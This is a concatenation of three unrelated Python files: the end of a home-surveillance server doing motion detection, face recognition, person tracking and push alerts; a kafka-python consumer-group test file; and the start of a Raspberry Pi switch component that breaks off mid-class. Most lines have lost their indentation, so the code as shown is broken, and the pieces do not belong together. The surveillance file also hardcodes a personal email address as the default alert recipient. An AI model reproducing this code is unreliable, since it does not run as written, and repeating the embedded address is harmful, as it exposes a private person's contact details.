self.cameras.pop(int(cid))
self.cameraProcessingThreads.pop(int(cid))
#self.captureThread.stop = False
    def process_frame(self,camera):
        """This function performs all the frame processing.
It reads frames captured by the IPCamera instance,
resizes them, and performs 1 of 5 functions"""
logger.debug('Processing Frames')
state = 1
frame_count = 0;
FPScount = 0 # Used to calculate frame rate at which frames are being processed
FPSstart = time.time()
start = time.time()
stop = camera.captureThread.stop
while not stop:
frame_count +=1
logger.debug("Reading Frame")
frame = camera.read_frame()
# Checks to see if the new frame is the same as the previous frame
if (frame is None) or np.array_equal(frame, camera.tempFrame):
continue
frame = ImageUtils.resize(frame)
height, width, channels = frame.shape
grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # frame in gray scale
# Frame rate calculation
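            # (processingFPS is refreshed every 6 processed frames as 6 / elapsed seconds)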
if FPScount == 6:
camera.processingFPS = 6/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
FPScount += 1
camera.tempFrame = frame
####################
# MOTION DETECTION #
####################
if camera.cameraFunction == "detect_motion":
camera.motion, mframe = camera.motionDetector.detect_movement(grayFrame, get_rects = False, grayFrame=True)
camera.processing_frame = frame #mframe
if camera.motion == False:
logger.debug('//// NO MOTION DETECTED /////')
continue
else:
logger.debug('/// MOTION DETECTED ///')
#print("- MOTION DETECTED -")
##################################
            # FACE DETECTION AND RECOGNITION #
##################################
elif camera.cameraFunction == "detect_recognise":
# This approach performs basic face detection and
# recognition using OpenCV, Dlib and Openface
training_blocker = self.trainingEvent.wait()
#rgbFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
camera.faceBoxes = camera.faceDetector.detect_faces(frame, camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
#frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, True) # OpenCV DNN returns dlib.rectangle
camera.processing_frame = frame
if len(camera.faceBoxes) > 0:
print('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
# Used to reduce false positives from opencv haar cascade detector.
                        # If the face isn't detected using more rigorous parameters in the detectMultiScale()
# function read the next frame
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = camera.dlibDetection)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
# returns a dictionary that contains name, confidence and representation and an alignedFace (numpy array)
predictions, alignedFace = self.recogniser.make_prediction(frame, face_bb)
with camera.peopleDictLock:
                            # If the person has already been detected and their new confidence is greater,
                            # update the person's details; otherwise create a new person
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'], predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'], predictions['confidence'], alignedFace, "unknown")
                    # Used for streaming processed frames to client and email alerts, but mainly used for testing purposes
camera.processing_frame = frame
#####################################################################
# MOTION DETECTION EVENT FOLLOWED BY FACE DETECTION AND RECOGNITION #
#####################################################################
elif camera.cameraFunction == "motion_detect_recognise":
                # When motion is detected, consecutive frames are processed for faces.
# If no faces are detected for longer than 30 seconds the thread goes back to
# looking for motion
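                # state == 1: waiting for motion; state == 2: detecting/recognising faces until
                # 30 seconds pass without a face, after which we fall back to state 1.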
training_blocker = self.trainingEvent.wait()
if state == 1: # If no faces have been found or there has been no movement
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
if camera.motion == True:
logger.debug('////////////////////// MOTION DETECTED //////////////////////')
state = 2
camera.processing_frame = mframe
else:
logger.debug('////////////////////// NO MOTION DETECTED //////////////////////')
continue
elif state == 2: # If motion has been detected
if frame_count == 0:
start = time.time()
frame_count += 1
#frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
if len(camera.faceBoxes) == 0:
if (time.time() - start) > 30.0:
logger.info('// No faces found for ' + str(time.time() - start) + ' seconds - Going back to Motion Detection Mode')
state = 1
frame_count = 0;
else:
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ////')
# frame = cv2.flip(frame, 1)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, "unknown")
start = time.time() # Used to go back to motion detection state of 30s of not finding a face
camera.processing_frame = frame
##################################################################################
            # MOTION DETECTION OBJECT SEGMENTATION FOLLOWED BY FACE DETECTION AND RECOGNITION #
##################################################################################
elif camera.cameraFunction == "segment_detect_recognise":
                # This approach uses background subtraction to segment a region of
# interest that is likely to contain a person. The region is cropped from
# the frame and face detection is performed on a much smaller image. This
                # improves processing performance but is highly dependent upon the accuracy of
# the background model generated by the MotionDetector object.
training_blocker = self.trainingEvent.wait()
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
if camera.motion == False:
camera.processing_frame = frame
logger.debug('////-- NO MOTION DETECTED --////')
continue
logger.debug('///// MOTION DETECTED /////')
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for x, y, w, h in peopleRects:
                    logger.debug('//// Processing People Segmented Areas ///')
bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
personimg = ImageUtils.crop(frame, bb, dlibRect = True)
personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
                        logger.info('/// Processing Detected faces ///')
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
with camera.peopleDictLock:
if predictions['name'] in camera.people:
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],
predictions['confidence'],
alignedFace, "unknown")
#############################################################################################
            # MOTION DETECTION OBJECT SEGMENTATION FOLLOWED BY FACE DETECTION, RECOGNITION AND TRACKING #
#############################################################################################
elif camera.cameraFunction == "detect_recognise_track":
# This approach incorporates background subtraction to perform person tracking
                # and is the most efficient of all the processing functions above. When
                # a face is detected in a region, a Tracker object is generated and is updated
# every frame by comparing the last known region of the person, to new regions
# produced by the motionDetector object. Every update of the tracker a detected
# face is compared to the person's face of whom is being tracked to ensure the tracker
                # is still tracking the correct person. This is achieved by comparing the prediction
                # and the l2 distance between their embeddings (128 measurements that represent the face).
# If a tracker does not overlap with any of the regions produced by the motionDetector object
# for some time the Tracker is deleted.
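                # Roughly: if the squared l2 distance between the tracked person's embedding and the
                # new face's embedding exceeds the 0.99 cutoff and the predicted name differs, the
                # detection is treated as a different person and the tracker is replaced; otherwise
                # the existing tracker's confidence and identity are simply updated (see below).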
training_blocker = self.trainingEvent.wait() # Wait if classifier is being trained
logger.debug('//// detect_recognise_track 1 ////')
peopleFound = False
camera.motion, peopleRects = camera.motionDetector.detect_movement(grayFrame, get_rects = True, grayFrame=True)
logger.debug('//// detect_recognise_track 2 /////')
if camera.motion == False:
camera.processing_frame = frame
logger.debug('///// NO MOTION DETECTED /////')
continue
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
logger.debug('//// MOTION DETECTED //////')
for x, y, w, h in peopleRects:
peopleFound = True
                    person_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
                    personimg = ImageUtils.crop(frame, person_bb) # Crop regions of interest
#personimg = cv2.flip(personimg, 1)
tracked = False
                    # Iterate through each tracker and compare their current position
for i in range(len(camera.trackers) - 1, -1, -1):
if camera.trackers[i].overlap(person_bb):
logger.debug("=> Updating Tracker <=")
camera.trackers[i].update_tracker(person_bb)
# personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg, camera.dlibDetection)
logger.debug('////// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' /////')
if len(camera.faceBoxes) > 0:
logger.info("Found " + str(len(camera.faceBoxes)) + " faces.")
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg, face_bb)
if predictions['confidence'] > self.confidenceThreshold:
predictedName = predictions['name']
else:
predictedName = "unknown"
# If only one face is detected
if len(camera.faceBoxes) == 1:
# if not the same person check to see if tracked person is unknown
# and update or change tracker accordingly
# l2Distance is between 0-4
# Openface found that 0.99 was the average cutoff between the same and different faces
# the same face having a distance less than 0.99
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep,
predictions['rep']) > 0.99 and \
(camera.trackers[i].person.identity != predictedName):
alreadyBeenDetected = False
with camera.peopleDictLock:
for ID, person in camera.people.items():
# iterate through all detected people in camera
# if the person has already been detected continue to track that person
# - use same person ID
if person.identity == predictedName or \
self.recogniser.getSquaredl2Distance(person.rep, predictions['rep']) < 0.8:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictedName)
logger.info( "====> New Tracker for " +person.identity + " <===")
# Remove current tracker and create new one with the ID of the original person
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1)
# Create a new person ID
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
# Is the new person detected with a low confidence? If yes, classify them as unknown
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
predictions['name'])
else:
person = Person(predictions['rep'],
predictions['confidence'],
alignedFace,
"unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "=====> New Tracker for new person <====")
del camera.trackers[i]
camera.trackers.append(Tracker(frame, person_bb, person,strID))
                                        # if it is the same person, update the confidence when the new one is higher
                                        # and change the prediction from unknown to the identified person once above the threshold
# if the new detected face has a lower confidence and can be classified as unknown,
# when the person being tracked isn't unknown - change tracker
else:
logger.info( "====> update person name and confidence <==")
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
# If more than one face is detected in the region compare faces to the people being tracked
# and update tracker accordingly
else:
logger.info( "==> More Than One Face Detected <==")
# if tracker is already tracking the identified face make an update
if self.recogniser.getSquaredl2Distance(camera.trackers[i].person.rep,
predictions['rep']) < 0.99 and \
camera.trackers[i].person.identity == predictions['name']:
if camera.trackers[i].person.confidence < predictions['confidence']:
camera.trackers[i].person.confidence = predictions['confidence']
if camera.trackers[i].person.confidence > self.confidenceThreshold:
camera.trackers[i].person.identity = predictions['name']
else:
# if tracker isn't tracking this face check the next tracker
break
camera.trackers[i].person.set_thumbnail(alignedFace)
camera.trackers[i].person.add_to_thumbnails(alignedFace)
camera.trackers[i].person.set_rep(predictions['rep'])
camera.trackers[i].person.set_time()
camera.trackers[i].reset_face_pinger()
with camera.peopleDictLock:
camera.people[camera.trackers[i].id] = camera.trackers[i].person
camera.trackers[i].reset_pinger()
tracked = True
break
# If the region is not being tracked
if not tracked:
# Look for faces in the cropped image of the region
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
if not isinstance(face_bb, dlib.rectangle):
x, y, w, h = face_bb
face_bb = dlib.rectangle(int(x), int(y), int(x+w), int(y+h))
faceimg = ImageUtils.crop(personimg, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(personimg,face_bb)
alreadyBeenDetected = False
with camera.peopleDictLock:
# iterate through all detected people in camera, to see if the person has already been detected
for ID, person in camera.people.items():
if person.identity == predictions['name'] or \
self.recogniser.getSquaredl2Distance(person.rep ,predictions['rep']) < 0.8:
if predictions['confidence'] > self.confidenceThreshold and \
person.confidence > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
logger.info( "==> New Tracker for " + person.identity + " <====")
camera.trackers.append(Tracker(frame, person_bb, person,ID))
alreadyBeenDetected = True
break
if not alreadyBeenDetected:
num = random.randrange(1, 1000, 1) # Create new person ID if they have not been detected
strID = "person" + datetime.now().strftime("%Y%m%d%H%M%S") + str(num)
if predictions['confidence'] > self.confidenceThreshold:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
person = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
#add person to detected people
with camera.peopleDictLock:
camera.people[strID] = person
logger.info( "====> New Tracker for new person <=")
camera.trackers.append(Tracker(frame, person_bb, person,strID))
for i in range(len(camera.trackers) - 1, -1, -1): # starts with the most recently initiated tracker
if self.drawing == True:
bl = (camera.trackers[i].bb.left(), camera.trackers[i].bb.bottom()) # (x, y)
tr = (camera.trackers[i].bb.right(), camera.trackers[i].bb.top()) # (x+w,y+h)
cv2.rectangle(frame, bl, tr, color=(0, 255, 255), thickness=2)
text = camera.trackers[i].person.identity + " " + str(camera.trackers[i].person.confidence)+ "%"
#print("text", text)
org = (camera.trackers[i].bb.left(), camera.trackers[i].bb.top() - 10)
#print("org", org)
cv2.putText(frame, text, org, cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.3, color=(0, 255, 255), thickness=1)
camera.processing_frame = frame
# Used to check if tracker hasn't been updated
camera.trackers[i].ping()
camera.trackers[i].faceping()
# If the tracker hasn't been updated for more than 10 pings delete it
if camera.trackers[i].pings > 10:
del camera.trackers[i]
continue
def alert_engine(self):
"""check alarm state -> check camera -> check event ->
either look for motion or look for detected faces -> take action"""
logger.debug('Alert engine starting')
while True:
with self.alertsLock:
for alert in self.alerts:
logger.debug('checking alert')
if alert.action_taken == False: # If action hasn't been taken for event
if alert.alarmState != 'All': # Check states
if alert.alarmState == self.alarmState:
logger.debug('checking alarm state')
alert.event_occurred = self.check_camera_events(alert)
else:
continue # Alarm not in correct state check next alert
else:
alert.event_occurred = self.check_camera_events(alert)
else:
                        if (time.time() - alert.eventTime) > 300: # Reinitialize event 5 min after the event occurred
                            logger.info( "reinitialising alert: " + alert.id)
alert.reinitialise()
continue
time.sleep(2) # Put this thread to sleep - let websocket update alerts if need be (i.e delete or add)
def check_camera_events(self,alert):
"""Used to check state of cameras
to determine whether an event has occurred"""
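        # Two things are matched: the alert targets either one camera index or 'All', and the
        # event is either 'Recognition' (a named person, or 'unknown', seen at or above the
        # alert's confidence threshold) or motion. On a match a snapshot is written to
        # notification/image.png and take_action() is called.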
if alert.camera != 'All': # Check cameras
logger.info( "alertTest" + alert.camera)
if alert.event == 'Recognition': #Check events
logger.info( "checkingalertconf "+ str(alert.confidence) + " : " + alert.person)
for person in self.cameras[int(alert.camera)].people.values():
logger.info( "checkingalertconf "+ str(alert.confidence )+ " : " + alert.person + " : " + person.identity)
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
logger.info( "alertTest2" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
logger.info( "alertTest3" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
logger.info( "alertTest4" + alert.camera)
if self.cameras[int(alert.camera)].motion == True: # Has motion been detected
logger.info( "alertTest5" + alert.camera)
cv2.imwrite("notification/image.png", self.cameras[int(alert.camera)].processing_frame)#
self.take_action(alert)
return True
else:
return False # Motion was not detected check next alert
else:
if alert.event == 'Recognition': # Check events
with self.camerasLock :
cameras = self.cameras
for camera in cameras: # Look through all cameras
for person in camera.people.values():
if alert.person == person.identity: # Has person been detected
if alert.person == "unknown" and (100 - person.confidence) >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
elif person.confidence >= alert.confidence:
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Person has not been detected check next alert
else:
with self.camerasLock :
for camera in self.cameras: # Look through all cameras
if camera.motion == True: # Has motion been detected
cv2.imwrite("notification/image.png", camera.processing_frame)#
self.take_action(alert)
return True
return False # Motion was not detected check next camera
def take_action(self,alert):
"""Sends email alert and/or triggers the alarm"""
logger.info( "Taking action: ==" + json.dumps(alert.actions))
        if alert.action_taken == False: # Only take action if alert hasn't occurred - Alerts reinitialise every 5 min for now
alert.eventTime = time.time()
if alert.actions['mycroft_message'] == 'true':
logger.info( "mycroft notification being sent")
self.send_mycroft_notification_alert(alert)
if alert.actions['apprise_message'] == 'true':
logger.info( "apprise notification being sent")
self.send_apprise_notification_alert(alert)
alert.action_taken = True
def send_apprise_notification_alert(self,alert):
# send a push message with Apprise - see https://github.com/caronc/apprise
print(">>>Apprise<<<", alert.alertString)
if not self.apobj:
self.apobj = apprise.Apprise()
            service = "" # set an Apprise url here, e.g. Pushbullet "pbul://xyz"
if service:
self.apobj.add(service)
print("alert.camera", alert.camera)
attachment = apprise.AppriseAttachment()
if alert.camera.endswith("All"):
camNum = 0
for c in self.cameras:
attachment.add('http://127.0.0.1:5000/camera_snapshot/{}'.format(camNum))
camNum += 1
else:
camNum = alert.camera[-1]
attachment.add('http://127.0.0.1:5000/camera_snapshot/{}'.format(camNum))
print("attachment", attachment)
        self.apobj.notify(body=alert.alertString, title='Home Surveillance', attach=attachment)
def send_mycroft_notification_alert(self,alert):
print(">>>Mycroft<<<", alert.alertString)
host = '' # set hostname or IP of your Mycroft device here
if host:
uri = 'ws://' + host + ':8181/core'
ws = create_connection(uri)
message = '{"type": "speak", "data": {"utterance": "' + alert.alertString + '"}, "context":{}}'
result = ws.send(message)
print("Received '%s'" % result)
ws.close()
def add_face(self,name,image, upload):
"""Adds face to directory used for training the classifier"""
if upload == False:
path = fileDir + "/aligned-images/"
else:
path = fileDir + "/training-images/"
num = 0
if not os.path.exists(path + name):
try:
                logger.info( "Creating New Face Directory: " + name)
os.makedirs(path+name)
            except OSError as e:
                logger.info(e)
return False
pass
else:
num = len([nam for nam in os.listdir(path +name) if os.path.isfile(os.path.join(path+name, nam))])
logger.info( "Writing Image To Directory: " + name)
cv2.imwrite(path+name+"/"+ name + "_"+str(num) + ".png", image)
self.get_face_database_names()
return True
def get_face_database_names(self):
"""Gets all the names that were most recently
used to train the classifier"""
path = fileDir + "/aligned-images/"
self.peopleDB = []
for name in os.listdir(path):
if (name == 'cache.t7' or name.startswith('.') or name[0:7] == 'unknown'):
continue
self.peopleDB.append(name)
logger.info("Known faces in our db for: " + name + " ")
self.peopleDB.append('unknown')
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
class Person(object):
"""Person object simply holds all the
person's information for other processes
"""
person_count = 0
def __init__(self,rep,confidence = 0, face = None, name = "unknown"):
print(">Person: confidence", confidence, "face", face is not None, "name", name)
if "unknown" not in name: # Used to include unknown-N from Database
self.identity = name
else:
self.identity = "unknown"
self.count = Person.person_count
self.confidence = confidence
self.thumbnails = []
self.face = face
self.rep = rep # Face representation
if face is not None:
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
self.thumbnails.append(self.thumbnail)
Person.person_count += 1
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
self.istracked = False
def set_rep(self, rep):
self.rep = rep
def set_identity(self, identity):
self.identity = identity
def set_time(self): # Update time when person was detected
now = datetime.now() + timedelta(hours=2)
self.time = now.strftime("%A %d %B %Y %I:%M:%S%p")
def set_thumbnail(self, face):
self.face = face
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnail = jpeg.tostring()
def add_to_thumbnails(self, face):
ret, jpeg = cv2.imencode('.jpg', face) # Convert to jpg to be viewed by client
self.thumbnails.append(jpeg.tostring())
class Tracker:
"""Keeps track of person position"""
tracker_count = 0
def __init__(self, img, bb, person, id):
self.id = id
self.person = person
self.bb = bb
self.pings = 0
self.facepings = 0
def reset_pinger(self):
self.pings = 0
def reset_face_pinger(self):
self.facepings = 0
def update_tracker(self,bb):
self.bb = bb
def overlap(self, bb):
p = float(self.bb.intersect(bb).area()) / float(self.bb.area())
return p > 0.2
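    # Overlap is the fraction of this tracker's box covered by the new box; e.g. an
    # intersection covering 30% of the tracker's area (0.3 > 0.2) counts as the same region.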
def ping(self):
self.pings += 1
def faceping(self):
self.facepings += 1
class Alert(object):
"""Holds all the alert details and is continually checked by
the alert monitoring thread"""
alert_count = 1
def __init__(self,alarmState,camera, event, person, actions, emailAddress, confidence):
logger.info( "alert_"+str(Alert.alert_count)+ " created")
if event == 'Motion':
self.alertString = "Motion detected in camera " + camera
else:
self.alertString = person + " was recognised in camera " + camera + " with a confidence greater than " + str(confidence)
self.id = "alert_" + str(Alert.alert_count)
self.event_occurred = False
self.action_taken = False
self.camera = camera
self.alarmState = alarmState
self.event = event
self.person = person
self.confidence = confidence
self.actions = actions
if emailAddress == None:
self.emailAddress = "bjjoffe@gmail.com"
else:
self.emailAddress = emailAddress
self.eventTime = 0
Alert.alert_count += 1
def reinitialise(self):
self.event_occurred = False
self.action_taken = False
def set_custom_alertmessage(self,message):
self.alertString = message
|
test_consumer_group.py
|
import collections
import logging
import threading
import time
import pytest
from kafka.vendor import six
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.coordinator.base import MemberState, Generation
from kafka.structs import TopicPartition
from test.fixtures import random_string, version
def get_connect_str(kafka_broker):
return kafka_broker.host + ':' + str(kafka_broker.port)
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, topic, version):
# The `topic` fixture is included because
# 0.8.2 brokers need a topic to function well
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
consumer.close()
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
    messages = collections.defaultdict(lambda: collections.defaultdict(list))  # per-consumer {TopicPartition: [records]}
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
            for tp, records in six.iteritems(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
consumers[i] = None
stop[i] = None
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
logging.info('All consumers have assignment... checking for stable group')
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator._generation.generation_id
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator._generation.generation_id,
consumer._coordinator._generation.member_id,
consumer.assignment())
break
else:
logging.info('Rejoining: %s, generations: %s', rejoining, generations)
time.sleep(1)
assert time.time() < timeout, "timeout waiting for assignments"
logging.info('Group stabilized; verifying assignment')
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
logging.info('Assignment looks good!')
finally:
logging.info('Shutting down %s consumers', num_consumers)
for c in range(num_consumers):
logging.info('Stopping consumer %s', c)
stop[c].set()
threads[c].join()
threads[c] = None
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
consumer.close()
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_heartbeat_thread(kafka_broker, topic):
group_id = 'test-group-' + random_string(6)
consumer = KafkaConsumer(topic,
bootstrap_servers=get_connect_str(kafka_broker),
group_id=group_id,
heartbeat_interval_ms=500)
# poll until we have joined group / have assignment
while not consumer.assignment():
consumer.poll(timeout_ms=100)
assert consumer._coordinator.state is MemberState.STABLE
last_poll = consumer._coordinator.heartbeat.last_poll
last_beat = consumer._coordinator.heartbeat.last_send
timeout = time.time() + 30
while True:
if time.time() > timeout:
raise RuntimeError('timeout waiting for heartbeat')
if consumer._coordinator.heartbeat.last_send > last_beat:
break
time.sleep(0.5)
assert consumer._coordinator.heartbeat.last_poll == last_poll
consumer.poll(timeout_ms=100)
assert consumer._coordinator.heartbeat.last_poll > last_poll
consumer.close()
|
switch_component.py
|
"""This module contains the SwitchComponent type."""
import threading
from raspy.argument_null_exception import ArgumentNullException
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.switches import switch_state
from raspy.components.switches.switch import Switch
from raspy.components.switches.switch_state_change_event import SwitchStateChangeEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.io import gpio
from raspy.pi_system import core_utils
OFF_STATE = pin_state.LOW
"""The pin state to consider the switch off."""
ON_STATE = pin_state.HIGH
"""The pin state to consider the switch on."""
class SwitchComponent(Switch):
"""A component that is an abstraction of a standard switch."""
def __init__(self, pin):
"""Initialize a new instance of SwitchComponent.
:param gpio.Gpio pin: The input pin the switch is attached to.
:raises: ArgumentNullException if pin is None.
"""
Switch.__init__(self)
if pin is None:
raise ArgumentNullException("'pin' param cannot be None.")
self.__isPolling = False
self.__pollThread = None
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pin = pin
self.__pin.provision()
self.__pin.on(gpio.EVENT_GPIO_STATE_CHANGED,
lambda evt: self._on_pin_state_changed(evt))
def _on_pin_state_changed(self, psce):
"""Handle the pin state change event.
This verifies the state has actually changed, then fires the switch
state change event.
:param raspy.io.pin_state_change_event.PinStateChangeEvent psce: The
pin state change event info.
"""
if psce.new_state != psce.old_state:
evt = SwitchStateChangeEvent(switch_state.ON, switch_state.OFF)
if psce.new_state == ON_STATE:
evt = SwitchStateChangeEvent(switch_state.OFF, switch_state.ON)
self.on_switch_state_changed(evt)
@property
def pin(self):
"""Get the GPIO pin this switch is attached to.
:returns: The underlying physical pin.
:rtype: gpio.Gpio
"""
return self.__pin
@property
def state(self):
